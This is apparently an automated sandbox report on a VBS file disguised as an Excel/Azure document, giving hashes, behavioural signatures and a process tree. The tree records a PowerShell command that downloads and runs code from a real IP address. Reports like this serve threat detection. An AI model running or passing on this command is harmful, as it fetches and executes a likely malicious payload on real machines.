Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240319-en -
resource tags
arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system -
submitted
09-04-2024 15:19
Static task
static1
Behavioral task
behavioral1
Sample
MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs
Resource
win7-20240319-en
4 signatures
150 seconds
General
-
Target
MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs
-
Size
880KB
-
MD5
e0217823f2f748254b43ede64e422199
-
SHA1
3bede6ac6d6e7362b64a7de6663c9b6caac29832
-
SHA256
2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f
-
SHA512
ab681712155c36cf0a8f44be5c181e4d4a2b61f3b35b2d6fa1266924b9932d8bab50b9e72a60d7e64ed3fa0504ec98726d81a2ebabf6bf403ac14dc5fb07c7b6
-
SSDEEP
24576:j2rHDMzlpSUY+g3Gy1U6dxvJwdd+2fk6T/dhTYzmQGeKsKBGrlrH:kAW59gs/s0dH
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1364 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1364 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1064 wrote to memory of 1364 1064 WScript.exe 28 PID 1064 wrote to memory of 1364 1064 WScript.exe 28 PID 1064 wrote to memory of 1364 1064 WScript.exe 28
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri '103.124.106.237/wctaehcw')2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364
-